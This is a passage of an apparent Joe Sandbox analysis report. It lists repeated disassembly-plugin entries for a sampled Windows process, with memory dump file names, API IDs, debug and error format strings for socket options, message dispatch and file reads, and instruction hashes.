                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                    • API String ID: 325303940-110789774
                                    • Opcode ID: d07cda9d40d31cfdc9b069523c433419c4783620534121b2c80ab477b358fdb1
                                    • Instruction ID: 6276aa7221a2ad8c577479981e1dac2d5c08b34672cab2f1d9fc2df518dbecd2
                                    • Opcode Fuzzy Hash: d07cda9d40d31cfdc9b069523c433419c4783620534121b2c80ab477b358fdb1
                                    • Instruction Fuzzy Hash: 9FF0A4E9F0818242F3525F7AEC8826D5560ABD4794F584271DC9DA37A4DD3CD9478B00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                    • API String ID: 325303940-110789774
                                    • Opcode ID: 00d460c4fe4838d49839943e88ea8a833d56d9e0a9063ae5a2ee6931c4e697ba
                                    • Instruction ID: b41f18537b9135d42eae21ca1a80508e356c5d966872a37880d60f7684e612a4
                                    • Opcode Fuzzy Hash: 00d460c4fe4838d49839943e88ea8a833d56d9e0a9063ae5a2ee6931c4e697ba
                                    • Instruction Fuzzy Hash: 3BF0C2A1B0C18382F7264B3AEC001AA5260AF95794F105231EC5ED37B4EEBCED4A8700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                    • API String ID: 325303940-110789774
                                    • Opcode ID: e8f7cbe0bc8c4c9985ebff542f77ee412fddaab2700f1b70fc6427175aa74bf1
                                    • Instruction ID: 98367d526835af6edd6b42942910703b5fc736fd21470e083f67d22299f8ce53
                                    • Opcode Fuzzy Hash: e8f7cbe0bc8c4c9985ebff542f77ee412fddaab2700f1b70fc6427175aa74bf1
                                    • Instruction Fuzzy Hash: CEF0C8E1A0C68A46F3125739EC0016D5270AB89754F1C8171EC2EAB7D4DE3CD8478701
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                    • API String ID: 1729277954-3534120083
                                    • Opcode ID: 87f38eb7fd0f74bec9fea3f6154acb28a59bfe47ff522814eac0aa74667299b7
                                    • Instruction ID: 135077a912624b6de6e1d03d19766d0e20a95a36f5286c797b31d6c83160a876
                                    • Opcode Fuzzy Hash: 87f38eb7fd0f74bec9fea3f6154acb28a59bfe47ff522814eac0aa74667299b7
                                    • Instruction Fuzzy Hash: 1BF0C2E1B1C1828AF3115F35EC011A66661AB85764F008235ED6DC37B4DFBCDD49CB01
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                    • API String ID: 1729277954-3534120083
                                    • Opcode ID: cafee47a4d8f4d8fbbff5e8d954c9ae92a2b048fd6e36d43f06f973e8104f05d
                                    • Instruction ID: 1705a341125fd55fa4abe7c7f8bdc3a3017c6993c7866af0aa6dc8428763f47d
                                    • Opcode Fuzzy Hash: cafee47a4d8f4d8fbbff5e8d954c9ae92a2b048fd6e36d43f06f973e8104f05d
                                    • Instruction Fuzzy Hash: B6F062E1E1D1828AF3115B35EC446B56660AB8A754F504231EE6DC37B4DFBCDD468B01
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                    • API String ID: 1729277954-3534120083
                                    • Opcode ID: 0f2572865ae401fbe053a1d484b6772c666df8ec2b438324ddcda121cf04f42d
                                    • Instruction ID: d8125c22e03ad280d218714a0ea1099f018777b639e7b767fc13fabbfabc8d84
                                    • Opcode Fuzzy Hash: 0f2572865ae401fbe053a1d484b6772c666df8ec2b438324ddcda121cf04f42d
                                    • Instruction Fuzzy Hash: A9F0F6A1A185828AF3129B39FC001AD2661FB96790F4C4372ED5D937A8DE3CD94ACB00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                    • API String ID: 1729277954-3534120083
                                    • Opcode ID: 2156d381e365d76bfe4c4005c088272f3c0c4caa9123f0b2749b6901f7b553e8
                                    • Instruction ID: 859e40e48b92740027e26034a23128ab5fbbb9e53bab87501dff6e85b048aca6
                                    • Opcode Fuzzy Hash: 2156d381e365d76bfe4c4005c088272f3c0c4caa9123f0b2749b6901f7b553e8
                                    • Instruction Fuzzy Hash: 70F0C8A9B1818245F3115F36FC487AD6660AB88794F084271ED9D97794DA3CD5468700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                    • API String ID: 1729277954-3534120083
                                    • Opcode ID: 0c760a2491ec1280324f3795e5dc2014b47fab201f17b75a483c0193ca51d165
                                    • Instruction ID: 93877306d660fe15ff438892448d119f98e88ec1f34b1f7def4316ee483a6841
                                    • Opcode Fuzzy Hash: 0c760a2491ec1280324f3795e5dc2014b47fab201f17b75a483c0193ca51d165
                                    • Instruction Fuzzy Hash: 1AF096A1A0C1824AF3515F39EC046A66660BB95764F044235ED6DD37F8DFBCDE4ACB00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                    • API String ID: 1729277954-3534120083
                                    • Opcode ID: 2ecdd9a7b9264e0365a5f3af328cace33ba77b0b828d794daba4b7fe4da9abe9
                                    • Instruction ID: 6688baaaebf006e43fa92b8de6dc869e7024706757580b6bd42caea1e55d768e
                                    • Opcode Fuzzy Hash: 2ecdd9a7b9264e0365a5f3af328cace33ba77b0b828d794daba4b7fe4da9abe9
                                    • Instruction Fuzzy Hash: 80F0BBE1B1858686F3515F35FC005AE6660BB89754F088271ED5D93BD8DE7CD54BC700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLastsetsockopt
                                    • String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
                                    • API String ID: 1729277954-536111009
                                    • Opcode ID: 2981db8f2838b7486ab9c45c532dcc9a6aa6a7f2e2118b4602ae2fd4717bb2ba
                                    • Instruction ID: 1f6b1c8258f58e78c704cb54193144f554c075fa8051882ce6a7b40f2a62828f
                                    • Opcode Fuzzy Hash: 2981db8f2838b7486ab9c45c532dcc9a6aa6a7f2e2118b4602ae2fd4717bb2ba
                                    • Instruction Fuzzy Hash: 24F02BE5B1818245F3115F76FC4826DA660BF84790F084371EDEDA37A4DE3CC44A8B00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: memsetstrchr
                                    • String ID: [D] (%s) -> %s$sam3_recv_rsp
                                    • API String ID: 2564583029-4292814133
                                    • Opcode ID: 18f10caa532e71d15769896ad8283505a8c7416f1da4c2eea4d9cbebd4928a5e
                                    • Instruction ID: 5f1a711e844962cd0f2e5709707717de7ef323f8f7103318b58df737ce1a8e9f
                                    • Opcode Fuzzy Hash: 18f10caa532e71d15769896ad8283505a8c7416f1da4c2eea4d9cbebd4928a5e
                                    • Instruction Fuzzy Hash: A8216A99F2C5C641FA229D3ADC9837D15406F067B0E1C43B0EEFA6A6D2ED2CE8428341
                                    APIs
                                    Strings
                                    • ebus_dispatch, xrefs: 00007FFB2273A2EF
                                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFB2273A2F6
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave
                                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                    • API String ID: 3168844106-1717220914
                                    • Opcode ID: 00b18d80a2ce8de70707daa5c040a2e4e9a725a2a8e4c899eaff6c951d948494
                                    • Instruction ID: dfa25a7202e20fb887d6292f71fada32a65d2b5bcd12f81626e5feb98f9d436c
                                    • Opcode Fuzzy Hash: 00b18d80a2ce8de70707daa5c040a2e4e9a725a2a8e4c899eaff6c951d948494
                                    • Instruction Fuzzy Hash: 0D216AB2A0CA8282FB128F21EC40229A360FB56B84F144135DE9D87674DF7CDC51C701
                                    APIs
                                    Strings
                                    • ebus_dispatch, xrefs: 00007FFB2276132F
                                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFB22761336
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave
                                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                    • API String ID: 3168844106-1717220914
                                    • Opcode ID: 52d7cadc6e4a4563d1bf88b7a5cf4bb1403956c0898b62c4c6cc599e28dd278a
                                    • Instruction ID: 5e7fc8c48d63ed2967bd12ab99dfa3a6a43153d15143cf6240371efd464614d5
                                    • Opcode Fuzzy Hash: 52d7cadc6e4a4563d1bf88b7a5cf4bb1403956c0898b62c4c6cc599e28dd278a
                                    • Instruction Fuzzy Hash: 0D2137B2E0CA8281FB228F22ED401796360FB4AB94B184135DA5EC77B4DF6CE845C700
                                    APIs
                                    Strings
                                    • ebus_dispatch, xrefs: 00007FFB23B0602F
                                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFB23B06036
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave
                                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                    • API String ID: 3168844106-1717220914
                                    • Opcode ID: a5014c7dabb765b7192ccb149263f2c28acd9e4aea2dda15328cf532619ffb35
                                    • Instruction ID: c62810fc30bf20cc5a5f028365c1913780bc448529e9b86ed53dfe95ae1d0b82
                                    • Opcode Fuzzy Hash: a5014c7dabb765b7192ccb149263f2c28acd9e4aea2dda15328cf532619ffb35
                                    • Instruction Fuzzy Hash: CC2162B6A08AC281E7528F31EC8827D6360FB84B94F184176DACD67B68DF3CD945C700
                                    APIs
                                    Strings
                                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFB22701336
                                    • ebus_dispatch, xrefs: 00007FFB2270132F
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave
                                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                    • API String ID: 3168844106-1717220914
                                    • Opcode ID: 55810baa1d20f1e5c1a0b1440629255b865e57286b9525177a27e918bacad5d4
                                    • Instruction ID: dc7d4dfd4cc08a35ce0c2a2562b5015f6cad2942657c40724d950c44c6ab1ab1
                                    • Opcode Fuzzy Hash: 55810baa1d20f1e5c1a0b1440629255b865e57286b9525177a27e918bacad5d4
                                    • Instruction Fuzzy Hash: B5215EB2A0CA8281FB268F22FC502696360FB4AB94B144131EA5DC7AB8DF7CDD55C700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: cb44c17b4e47c61bceb64ef853c57834eac4735260689cd32846fd4a7b3e6c0b
                                    • Instruction ID: 72772b8673c10ed9cafe45aad5980bdd99ba1260919da5cd69bf31edb99e793b
                                    • Opcode Fuzzy Hash: cb44c17b4e47c61bceb64ef853c57834eac4735260689cd32846fd4a7b3e6c0b
                                    • Instruction Fuzzy Hash: 53F03023B0B106C2F963AA04B4417B995522F55378E8B0AB58D480A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: fclose
                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                    • API String ID: 3125558077-1073242539
                                    • Opcode ID: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction ID: 54bd699ae22562beec09e08ef17eb5b5a256da3638fa963e94642d4215f613aa
                                    • Opcode Fuzzy Hash: e46899573921c1e84c6f510f508363e14cb84ebdf7ad9e79a4d83c456136e3d4
                                    • Instruction Fuzzy Hash: 51F03023A0B106C2F963AA04B4417B995521F55378E8B0AB58D490A6F1AE3EA8878320
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
